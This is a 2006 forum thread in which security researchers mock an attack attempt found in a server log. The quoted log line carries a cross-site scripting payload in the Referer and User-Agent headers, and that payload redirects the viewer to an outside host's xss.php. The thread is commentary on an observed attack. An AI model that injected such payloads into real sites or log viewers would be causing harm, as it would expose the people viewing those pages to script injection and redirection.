Come on
Posted by: rsnake
Date: November 07, 2006 03:30PM

Saw this in the logs today. The IP address shall remain nameless. You know who you are. Seriously, are you kidding me?

xxx.xxx.xxx.xxx - - [07/Nov/2006:08:12:59 -0800] "GET / HTTP/1.0" 200 33738 "<script>window.location='http://paranoid.horrible.net/~rjx/xss.php';</script>" "<script>window.location='http://paranoid.horrible.net/~rjx/xss.php';</script>"

- RSnake
Gotta love it. http://ha.ckers.org

Re: Come on
Posted by: jungsonn
Date: November 07, 2006 04:47PM


Re: Come on
Posted by: Kyran
Date: November 07, 2006 05:42PM

Wow. Rule # 1 broken?

- Kyran

Re: Come on
Posted by: jungsonn
Date: November 30, 2006 09:38AM

As I saw this in my logs today:



So, so silly.
First of all, this script isn't on my server :o)

And that does not work, 'cause you have to know the session code which is passed through the CAPTCHA image, so any URI messing is useless.
And why is he/she putting PHP in the request?

Did he/she think I wrote that script to let that get passed? I guess not.
What are people thinking these days...
